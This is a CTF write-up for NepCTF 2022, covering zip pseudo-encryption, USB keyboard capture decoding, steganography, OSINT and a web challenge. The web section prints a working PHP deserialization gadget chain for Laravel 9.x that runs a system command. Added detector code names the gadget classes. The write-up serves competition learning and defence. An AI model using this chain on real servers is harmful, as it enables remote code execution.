NEPCTF 2022 WP

Warning
This article was last updated on 2023-02-01; its content may be out of date.

misc

花花画画画花花 (Huahua Paints Flowers)

Author: β-AS

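Huahua drew a picture. Can you tell what she drew?

(The flag format is NepCTF{})

Unzipping gives an osu! beatmap. I am not good enough at the game to clear it.

Import it into osu! and turn on a mode that cannot fail, then read the beatmap.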

I typed the flag out while watching the replay.

签到题 (Sign-in Challenge)

Author: limu

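Extreme nesting dolls

The flag format is nepctf{}

Once the archive had been replaced the approach was clear: it is a set of nested zip archives with no password, so unpack them layer by layer.

The script below is based on 贝塔师傅 (β)'s script: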

# coding=utf-8
import os
import zipfile

original_zip = "Untitled1.zip"
while True:
    tag = original_zip
    try:
        # Open the current layer and extract its first member
        with zipfile.ZipFile(tag) as zf:
            zipname = zf.namelist()[0]
            zf.extract(zipname)
        print(tag)
    except Exception:
        # Extraction fails at the innermost archive (1.zip), so stop there
        break
    if len(tag) > 5:
        os.remove(tag)  # delete the layer that has just been unpacked
    original_zip = zipname

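Unpacking all the way down leaves 1.zip.

It contains a packet capture that is shown as encrypted. This turns out to be pseudo-encryption: changing deFlags from 05 to 00 makes it extractable.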
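The same check and fix can be scripted. The following is an added example, not part of the original write-up: it tests whether an archive is only flagged as encrypted and clears the flag bit. It goes slightly beyond the manual edit above by patching the local file header as well as the central directory entry; the function names and the sample archive are constructed for illustration.

```python
import io
import struct
import zipfile

ENC_BIT = 0x01  # bit 0 of the general-purpose flag word: "entry is encrypted"

def flag_offsets(data):
    """Offsets of the flag word in every central and local file header."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
    offsets = []
    for _ in range(count):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("corrupt central directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (local,) = struct.unpack_from("<I", data, pos + 42)
        offsets += [pos + 8, local + 6]  # central flags at +8, local flags at +6
        pos += 46 + name_len + extra_len + comment_len
    return offsets

def set_encrypted_bit(data, on):
    """Return a copy of the archive with the encryption bit set or cleared."""
    buf = bytearray(data)
    for off in flag_offsets(data):
        buf[off] = buf[off] | ENC_BIT if on else buf[off] & ~ENC_BIT & 0xFF
    return bytes(buf)

def is_pseudo_encrypted(data):
    """True if entries are flagged encrypted yet pass CRC once the bit is cleared."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if not any(info.flag_bits & ENC_BIT for info in zf.infolist()):
            return False
    try:
        with zipfile.ZipFile(io.BytesIO(set_encrypted_bit(data, False))) as zf:
            return zf.testzip() is None
    except Exception:
        return False  # genuinely encrypted data does not decompress cleanly

def make_sample():
    """Constructed sample: an ordinary zip whose headers are then marked encrypted."""
    raw = io.BytesIO()
    with zipfile.ZipFile(raw, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("keyboard.pcap", b"constructed placeholder bytes\n" * 8)
    return set_encrypted_bit(raw.getvalue(), True)
```
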

The capture is USB keyboard traffic.

First extract the HID data:

tshark -r keyboard.pcap -T fields -e usbhid.data >usb.txt

Then run this script:

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":","34":"\"","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}


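nums = []
keys = open('usb.txt')
for line in keys:
    # Each keyboard report is 8 bytes: 16 hex characters plus the newline
    if len(line)!=17:
        continue
    nums.append(line[0:2]+line[4:6]) # take bytes 1 and 3: modifier and first keycode
keys.close()
output = ""
for n in nums:
    # Keycode 00 means no key is pressed in this report
    if n[2:4] == "00" :
        continue

    if n[2:4] in normalKeys:
        # Modifier 02 is left Shift
        if n[0:2]=="02":
            output += shiftKeys [n[2:4]]
        else :
            output += normalKeys [n[2:4]]
    else:
        output += '[unknown]'
print('output :\n' + output)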

There is a small problem: some characters come out duplicated. Deleting the repeated characters gives the flag.

nepctf{welcome-to-nepctf-2nd}
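The duplicates appear because the script emits the first keycode slot of every report, so a key that is still held when the next key goes down is printed again. The following added example (not part of the original write-up) decodes the same 8-byte reports by emitting only newly pressed keys; it also reads all six keycode slots, treats either Shift as Shift and applies Backspace, which goes beyond the script above. The keymap layout, function name and sample reports are constructed for illustration.

```python
import string

# HID usage IDs 0x04-0x27 are a-z followed by 1-0; punctuation keys follow.
PLAIN = dict(zip(range(0x04, 0x28), string.ascii_lowercase + "1234567890"))
SHIFT = dict(zip(range(0x04, 0x28), string.ascii_uppercase + "!@#$%^&*()"))
PLAIN.update(zip(range(0x2c, 0x32), " -=[]\\"))
SHIFT.update(zip(range(0x2c, 0x32), " _+{}|"))
PLAIN.update(zip(range(0x33, 0x39), ";'`,./"))
SHIFT.update(zip(range(0x33, 0x39), ":\"~<>?"))

def decode_reports(lines):
    """Decode 8-byte keyboard reports given as hex strings, one per line."""
    out, held = [], set()
    for line in lines:
        hexstr = line.strip().replace(":", "")
        if len(hexstr) != 16:
            continue                       # not a keyboard report
        report = bytes.fromhex(hexstr)
        shift = bool(report[0] & 0x22)     # left (0x02) or right (0x20) Shift
        keys = [k for k in report[2:8] if k > 0x03]  # 0x00-0x03: none/error
        for k in keys:
            if k in held:
                continue                   # still held from an earlier report
            if k == 0x2a:                  # Backspace removes the last character
                if out:
                    out.pop()
            elif k == 0x28:                # Enter
                out.append("\n")
            else:
                out.append((SHIFT if shift else PLAIN).get(k, "[unknown]"))
        held = set(keys)
    return "".join(out)

# Constructed sample: "n" is still held while "e" is pressed, then Shift+"[".
SAMPLE = [
    "0000110000000000",
    "0000110800000000",
    "0000080000000000",
    "0000000000000000",
    "02002f0000000000",
]
```

On the sample the first-slot approach yields "nne{", while decode_reports(SAMPLE) yields "ne{".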

少见的bbbbase (The Rarely Seen bbbbase)

Author: β - AS

A rarely seen bbbbase

This is the first time I have solved a challenge with jphide.

Detection with stegdetect:

Extract the hidden file with jphs5:

This produces a file; opening it shows a base58 string:

KkYWdvCQcLYewSUUy5TtQc9AMa

Decoding the base58 gives the flag:

flag{Real_qiandao~}

9点直播 (9 O'Clock Livestream)

Author: 花花~

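Hello everyone, the competition has been running for nearly ten hours. How is it going? You are invited to come and chat in the livestream at 9 o'clock. Stay tuned at https://b23.tv/bn0pPAR. Our assistant has received feedback that everyone wants to beat up the challenge authors, so tonight at 9 we have invited the twisted challenge authors to talk with you in the livestream and release our hints to help you solve the challenges. We will also draw lucky participants in the livestream and give away our merchandise.

The flag is given out in the livestream.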

NepCTF{bad_woman_nb!}

馅饼?陷阱! (Windfall? Trap!)

Author: Zuni

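My buddy won a prize, but he has to wire money first. Where did he go?

NepCTF{URL of the bank's official website}

In the second image the license plate begins with 琼, which tells us the location is Hainan.

Search for 东北饺子城 (Dongbei Dumpling City) together with Hainan.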

Check the map; the panorama (street view) map shows the same scenery.

Search for the official website of China Everbright Bank (光大) to get the flag.

flag{cebbank.com}

Questionnaire

NepCTF{see_you_NepCTF_2023}

RE

快来签到 (Come and Sign In)

Author: emtanling

x86 linux

A pure guessing challenge.

The flag is in the Graph.

NepCTF{welc0me_t0_nepctf}

web

Just Kidding

Author: H3h3QAQ

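The mischievous HRP wrote a project in Laravel to welcome everyone to NepCTF 2nd, but unexpectedly… it got pwned by the villain Sharun.

A directory scan turns up a few directories and a backup file.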

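The backup shows Laravel version 9.20, which leads to a recent vulnerability: the Laravel 9.18 deserialization command execution.

Searching the source for hello then locates the file that handles hello, which shows that its parameter is h3.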

Build a gadget chain and pass it in h3.

The chain:

<?php

namespace Faker {
    class Generator {
        protected $providers = [];
        protected $formatters = [];
        function __construct() {
            $this->formatter = "dispatch";
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        public function __construct() {
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    abstract class AbstractPart {
        private $headers = null;
    }

    class SMimePart extends AbstractPart {
        protected $_headers;
        public $h3rmesk1t;
        function __construct() {
            $this->_headers = ["dispatch"=>"system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}


namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/","\\1\\3\\2\\4",serialize($pop));
    echo base64_encode(str_replace("i:9999","R:2",$ser));
}
?>
NepCTF{2a815677-a04d-47eb-b1ba-acbbe1eaf247}
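From the defender's side, a request parameter carrying a base64-encoded PHP object, as h3 does here, is visible before it reaches unserialize(). The following added example (not part of the original write-up or the challenge code) extracts the class names from such a value and matches them against the classes used in the chain above; the function names and the sample inputs are constructed for illustration.

```python
import base64
import binascii
import re

# Class names taken from the chain above; this deny-list is illustrative only.
GADGET_CLASSES = {
    "Faker\\Generator",
    "Illuminate\\Broadcasting\\PendingBroadcast",
    "Symfony\\Component\\Mime\\Part\\SMimePart",
}
# O:<len>:"<class>":<property count>:  (C: marks a custom-serialized object)
OBJECT_RE = re.compile(rb'[OC]:(\d+):"([^"]+)":\d+:')

def serialized_classes(value):
    """Class names of PHP-serialized objects found in a raw or base64 value."""
    blobs = [value.encode("utf-8", "replace")]
    try:
        blobs.append(base64.b64decode(value, validate=True))
    except (binascii.Error, ValueError):
        pass  # not base64, so only the raw form is scanned
    names = []
    for blob in blobs:
        for length, name in OBJECT_RE.findall(blob):
            if int(length) == len(name):  # declared length must match the name
                names.append(name.decode("utf-8", "replace"))
    return names

def inspect_param(value):
    """Summarise one request parameter for logging or blocking."""
    names = serialized_classes(value)
    return {
        "has_object": bool(names),
        "gadget_classes": sorted(set(names) & GADGET_CLASSES),
    }

def constructed_sample(cls):
    """Constructed input: an empty serialized object of class cls, base64-encoded."""
    return base64.b64encode(f'O:{len(cls)}:"{cls}":0:{{}}'.encode()).decode()
```

A deny-list only catches chains that are already known; the durable fix is to stop passing request data to unserialize(), or to call it with ['allowed_classes' => false].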

Challenger

Author: H3h3QAQ

The mischievous HRP switched to another language to write a project welcoming everyone, and once again it got pwned by Sharun.
